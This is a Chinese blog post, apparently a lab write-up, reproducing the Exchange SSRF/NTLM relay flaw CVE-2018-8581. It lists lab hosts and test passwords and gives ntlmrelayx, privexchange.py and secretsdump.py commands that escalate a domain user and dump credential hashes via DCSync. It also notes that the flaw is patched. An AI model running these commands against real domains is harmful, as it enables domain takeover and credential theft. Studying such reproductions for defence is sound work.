CVE-2018-8581漏洞复现

最新推荐文章于 2024-05-22 12:45:00 发布
最新推荐文章于 2024-05-22 12:45:00 发布
阅读量943 收藏 1
点赞数
分类专栏: 内网蠕动 漏洞复现 文章标签: windows python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/119934405
版权

CVE-2018-8581漏洞复现

环境搭建

主机机器名ip用户密码版本
域控1ad1.test.com192.168.164.174administratorAa1234win2012r2
exchange2016-cu11mail1.test.com192.168.164.173administratorAa1234win2012r2
域内机器user.test.com192.168.164.129user1Uu1234.win2008r2
kali192.168.152.45192.168.164.128xxxxxxkali

漏洞复现

由于exchange机器账户默认可以配置

'DS-Replication-Get-Changes'     = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2

Exchange Windows Permissions,Exchange Trusted Subsystem都具备Write-ACL的权限。
Exchange Trusted Subsystem的成员包括Exchange机器用户
这里是ssrf的利用,由于这个ssrf使用的http协议,所以默认不需要签名,所以可以中继到域管配置账户拥有dcsync的权限
首先在kali上配置ntlm中继

proxychains python3 ntlmrelayx.py -t ldap://192.168.164.174 --escalate-user user1

之后触发,由于kali的ssl有些问题,使用windows

python privexchange.py -ah 192.168.30.204 -u user1 -d test.com -ev 2013 192.168.164.173 -p Uu1234.

之后
在这里插入图片描述
使用dcsync

proxychains python3 secretsdump.py test/user1:Uu1234.@192.168.164.174 -dc-ip 192.168.164.174

利用这个环境是只需要一个代理,如果不出网可以使用linux机器或者直接通过端口转发出网,一样的效果,

目前官方已经修复该漏洞

https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0686
https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2019-0724

参考文章

https://daiker.gitbook.io/windows-protocol/ntlm-pian/7#4-cve-2018-8581
https://github.com/dirkjanm/PrivExchange

whojoe
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-8581 漏洞分析
whojoe的博客
08-27 2574
CVE-2018-8581 漏洞分析前言环境搭建工具分析 前言 这里只是简单分析漏洞产生的代码逻辑,因为不熟悉exchange的业务逻辑,所以分析不会很深入,争取以后慢慢补充 环境搭建 主机 机器名 ip 用户 密码 版本 域控1 ad1.test.com 192.168.164.174 administrator Aa1234 win2012r2 exchange2016-cu11 mail1.test.com 192.168.164.173 administrator Aa1234
Microsoft Exchange漏洞分析 - CVE-2018-8581
dengzhasong7076的博客
01-30 886
此篇为漏洞分析,想看漏洞利用可以点这 前言 前一段时间Exchange出现了CVE-2018-8581漏洞,整个漏洞利用超赞,很值得复现以及分析,因为其中需要的不仅仅是Web方面的,更多还需要Windows相关的安全知识,其中相结合才能达到如此大的危害。 其根本原因由于PushSubscription接口存在SSRF,它允许为任何用户推送订阅所指定的URL,当Exchange尝试连接UR...
漏洞学习篇:CVE漏洞复现
最新发布
qq_44005305的博客
05-22 593
攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。1、200份很多已经买不到的绝版电子书 2、30G安全大厂内部的视频资料 3、100份src文档 4、常见安全面试题 5、ctf大赛经典题目解析 6、全套工具包 7、应急响应笔记 8、网络安全学习路线。Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。可以看见,apache是49版本的。
EXCHANGE上冒充任意用户--Exchange Server权限提升漏洞(CVE-2018-8581)分析
weixin_30929011的博客
06-18 346
0x00 前言 这是我们2018年Top 5趣案系列中的第三个案例。这些漏洞都有一些因素使它们从今年发布的大约1,400个报告中脱颖而出。今天我们将分析一个Exchange漏洞,它允许任何经过身份验证的用户冒充Exchange Server上的其他用户。 在ZDI的Dustin Childs 12月的文章中,他提到了一个Exchange漏洞,允许Exchange服务器上的任何用户冒充该Exc...
iis常见漏洞(中间件常见漏洞
qq_56438857的博客
08-17 8941
漏洞的意义:1、 猜解后台地址2、 猜解敏感文件,例如备份的rar、zip、.bak、.sql文件等。3、 在某些情形下,甚至可以通过短文件名web直接下载对应的文件。该漏洞的局限性:1、 只能猜解前六位,以及扩展名的前三位。2、 名称较短的文件是没有相应的短文件名的。3、 不支持中文文件名4、 如果文件名前6位带空格,8.3格式的短文件名会补进,和真实文件名不匹配5、 需要IIS和.net两个条件都满足。...
web常见中间件漏洞之IIS中间件漏洞
qq_52486507的博客
03-30 1116
1.IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。2.IIS一般适用于windows系统,而不适用于其它系统。
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
Exchange SSRF 域内提权漏洞复现(CVE-2018-8581)
谢公子的博客
07-01 3991
漏洞描述 Exchange Server于2018年11月份被爆出存在SSRF漏洞,可以伪造任意用户。但在之后又被爆出另外一种攻击方式,可以使用任意域内用户通过NTML Relay来接管域控!攻击者仅需要拥有一个普通域内用户权限即可对存在漏洞的Exchange服务器发起攻击,进而接管域控。 漏洞影响版本 Exchange 2010 ~ Exchange 2016 漏洞过程 Exchange允许任何用户为推送订阅指定所需的URL,服务器将尝试向这个URL发送通知。问题出在Excha...
CVE-2018-8581复现
weixin_42255372的博客
12-19 913
漏洞描述: Exchange Server于2018年11月份被爆出存在SSRF漏洞,可以伪造任意用户。但在之后又被爆出另外一种攻击方式,可以使用任意域内用户通过NTML Relay获取到krbtgt的hash。该hash可用于制作黄金票据,最后可以达到全域通畅的效果。 影响范围: Exchange 2010、Exchange 2013、Exchange 2016 漏洞复现: 环境: DC Wi...
Microsoft Exchange漏洞记录(撸向域控) - CVE-2018-8581
dengzhasong7076的博客
01-22 2889
前一段时间exchange出现了CVE-2018-8581,搭了许久的环境,不过不得不敬佩这个漏洞整体超赞。 一开始主要还是利用盗取exchange的管理员权限去调用一些接口,导致可以做到,比如收取别人邮件,替别人发送邮件。 攻击域控 今天出了一个更加深入的利用分析 主要是利用了ews推送的ssrf,进行ntlm relay,从http -> ldap的利用。主要还是exchang...
利用Exchange Server CVE-2018-8581+HASH传递玩爆AD
weixin_33770878的博客
01-29 304
概述微软 Exchange Server于2018年11月份被爆出存在S.S.R.F漏洞漏洞编号为:CVE-2018-8581,此漏洞微软已推出缓解措施,但是在1月22日又爆出了此漏洞的另一种方法,而利用这种新的方法将为AD带来严重的安全风险,此漏洞在实施微软的缓解措施之后,仍然会被成功attack。 本文将在以下环境中进行模拟演练:1.Exchange2013 CU19(已实施微软推出的缓解措...
Exchange CVE-2018-8581 补丁有用?没用?
weixin_43639741的博客
04-17 660
n1nty@360 A-TEAM 对网络安全只要稍有关注的话应该早就已经知道这个漏洞了。 CVE-2018-8581 TL;DR 漏洞最早由 ZDI 披露,ZDI 发现的 PoC 里面利用此漏洞实现了接管任意人的收件箱的效果。 原理比较简单,该漏洞实质是由 SSRF (Server-Side Request Forgery:服务器端请求伪造)漏洞和其他安全机制相结合造成的。Exchange 允许任...
Microsoft Exchange CVE-2018-8581资源合集(附今日爆款)
blackorbird的博客
01-22 304
近日,Microsoft公告中披露了一则关于Exchange Server的任意用户伪造漏洞Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协...
pyenv通过(proxychains)方式安装python
chuowan2555的博客
01-22 583
提示异常 You must get working getaddrinfo() function. or you can specify "--disable-ipv6". $ PYTHON_CONFIGURE_OPTS="--disable-ipv6" proxychains ...
cve-2018-1297环境复现
08-03
CVE-2018-1297是一个Apache Struts框架中的严重漏洞。此漏洞允许攻击者通过精心构造的恶意请求来执行任意命令,从而完全控制服务器。 要复现CVE-2018-1297漏洞,需要以下步骤: 1. 设置实验环境:首先,需要准备一个安装了Apache Struts 2.3.x版本的服务器。可以使用轻量级的虚拟机或Docker容器等方式来创建这个环境。 2. 构造恶意请求:接下来,需要使用恶意的HTTP请求来触发漏洞。可以使用各种工具(如Curl、Postman等)来构造并发送这个请求。 3. 利用漏洞:恶意请求的主要目的是通过使用特定的参数和数据,来构造一个命令执行的payload。这个payload会被传递给Struts 2框架,从而触发漏洞并执行攻击者所期望的命令。 4. 验证漏洞:在恶意请求被发送之后,可以通过查看服务器日志或其他输出来验证是否成功触发了CVE-2018-1297漏洞。如果成功,攻击者将获得完全的远程访问权限。 5. 漏洞修复:一旦漏洞被成功复现和验证,需要立即采取措施来修复漏洞。这可能包括更新Apache Struts框架到最新版本,或者应用官方提供的安全补丁程序。 总结而言,要复现CVE-2018-1297漏洞需要设置实验环境、构造恶意请求、利用漏洞以及验证漏洞。这个漏洞的严重性需要及时修复和部署补丁以确保服务器的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值